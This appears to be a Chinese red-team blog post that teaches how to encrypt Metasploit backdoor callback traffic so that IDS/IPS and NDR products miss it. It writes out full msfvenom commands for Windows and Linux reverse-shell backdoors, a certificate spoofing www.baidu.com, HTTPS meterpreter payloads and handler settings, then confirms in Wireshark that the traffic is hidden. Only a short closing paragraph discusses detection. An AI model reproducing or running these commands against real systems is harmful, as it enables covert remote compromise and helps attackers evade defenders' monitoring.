1. 首页
  2. 红队技术

MSF监听之加密流量下的后门上线

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

mOon 2022年5月26日 pm3:40 红队技术 阅读 875

#本文作者:Drunkbaby, 转载自FreeBuf。

原文链接:https://www.freebuf.com/articles/network/333934.html

仅供技术分享交流学习,侵权请联系我们删除。

MSF监听之加密流量下的后门上线
0x00写在前面
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

MSF监听之加密流量下的后门上线
0x01背景描述
在攻防对抗过程中的横行渗透,经常需要msf进行攻击操作,如果msf上线shell过程中流量是明文传输,那么内网环境中已有的安全检测产品(WAF/IPS/IDS/NDR/HIDS)等防护软件会进行流量检测,明文传输带有明显的攻击特征。很快会被检测发现,防守方对攻击流量回溯分析,就会阻断攻击行为。MSF监听之加密流量下的后门上线
MSF监听之加密流量下的后门上线
 
MSF监听之加密流量下的后门上线
0x02明文流量
win环境
1.生成上线后门
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.86.2 LPORT=12377 -f exe > yun.exe
MSF监听之加密流量下的后门上线
2.设置msf监听
MSF监听之加密流量下的后门上线
3.成功上线shell
将生成的后门程序上传到目标服务器进行执行。
MSF监听之加密流量下的后门上线
后门上线
MSF监听之加密流量下的后门上线
4.分析流量
通过Wireshark抓包分析流量,整个通信过程全部为明文传输
通信过程由受害主机发起
MSF监听之加密流量下的后门上线
过滤tcp目的端口
tcp.dstport == 12377
追踪tcp数据流
MSF监听之加密流量下的后门上线
通过分析可以发现,该tcp连接由服务器端发起,传输数据为明文信息
MSF监听之加密流量下的后门上线
 
Linux环境
1.生成上线后门
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.86.2 LPORT=12399 -f elf > yun.elf
MSF监听之加密流量下的后门上线
2.设置msf监听
msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcppayload => linux/x64/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > set lhost 192.168.86.2lhost => 192.168.86.2msf5 exploit(multi/handler) > set lport 12399lport => 12399msf5 exploit(multi/handler) >
MSF监听之加密流量下的后门上线
3.成功上线shell
将生成的后门程序上传到目标服务器进行执行。
MSF监听之加密流量下的后门上线
获取meterpreter会话
MSF监听之加密流量下的后门上线
4.分析流量
通过Wireshark抓包分析流量,整个通信过程全部为明文传输
通信过程由受害主机发起
MSF监听之加密流量下的后门上线
过滤tcp目的端口
tcp.dstport == 12399
追踪tcp数据流
MSF监听之加密流量下的后门上线
通过分析可以发现,该tcp连接由服务器端发起,传输数据为明文信息
MSF监听之加密流量下的后门上线

MSF监听之加密流量下的后门上线
0x03加密流量(windows)
通过使用OpenSSL流量加密
1.生成OpenSSL证书
openssl req -new -newkey rsa:4096 -days 365 -nodes -x509-subj "/C=UK/ST=London/L=London/O=Development/CN=www.baidu.com"-keyout www.baidu.com.key-out www.baidu.com.crt &&cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem &&rm -f www.baidu.com.key www.baidu.com.crt
MSF监听之加密流量下的后门上线
2.使用证书生成后门
windowsMSF监听之加密流量下的后门上线
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.86.2 LPORT=4433 PayloadUUIDTracking=true HandlerSSLCert=www.baidu.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o zui.exe
MSF监听之加密流量下的后门上线
bat后门MSF监听之加密流量下的后门上线
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.86.2 LPORT=4433 PayloadUUIDTracking=true HandlerSSLCert=www.baidu.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o zui.bat
MSF监听之加密流量下的后门上线
3.设置msf监听
msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_winhttpspayload => windows/x64/meterpreter/reverse_winhttpsmsf5 exploit(multi/handler) > set lhost 192.168.86.2lhost => 192.168.86.2msf5 exploit(multi/handler) > set lport 4433lport => 4433msf5 exploit(multi/handler) > set handlersslcert www.baidu.com.pemhandlersslcert => www.baidu.com.pemmsf5 exploit(multi/handler) > set stagerverifysslcert true
MSF监听之加密流量下的后门上线
3.成功上线shell
注意:windows 7环境下通过OpenSSL流量加密无法上线成功!MSF监听之加密流量下的后门上线
以下是运行结果
MSF监听之加密流量下的后门上线
连接超时无法上线
MSF监听之加密流量下的后门上线
更换window10 环境,成功上线
执行程序,获取会话
MSF监听之加密流量下的后门上线
4.分析流量
通过Wireshark抓包分析流量,整个通信过程全部为加密流量传输
通信过程由受害主机发起
MSF监听之加密流量下的后门上线
过滤tcp目的端口
tcp.dstport == 4433
追踪tcp数据流
MSF监听之加密流量下的后门上线
通过分析可以发现,该tcp连接由服务器端发起,传输数据为加密信息MSF监听之加密流量下的后门上线
MSF监听之加密流量下的后门上线

MSF监听之加密流量下的后门上线
0x04思考
安全的本质就是对抗!针对加密流量的检测,传统的基于特征的检测已经无法满足攻击发展的趋势,只有通过不断引入新的检测思考才能解决。MSF监听之加密流量下的后门上线
加密流量的检测,业界主流有2种方法:
第一种是将加密流量进行解密并进行检测,这需要安全检测设备充当通信双方的代理或者由客户提供单独的解密证书(只能针对该证书对应的加密流量进行解码)
第二种是在不解密的情况下进行安全检测,这通常会采用(AI)机器学习的方法。
当然对攻击行为的感知,也可以通过威胁狩猎发现。

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/5460.html

(0)
mOon mOon
0
渗透测试-流量加密之冰蝎&蚁剑
« 上一篇 2022年5月23日 am2:59
学习笔记之Linux内网渗透
下一篇 » 2022年5月26日 pm3:40

相关推荐

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息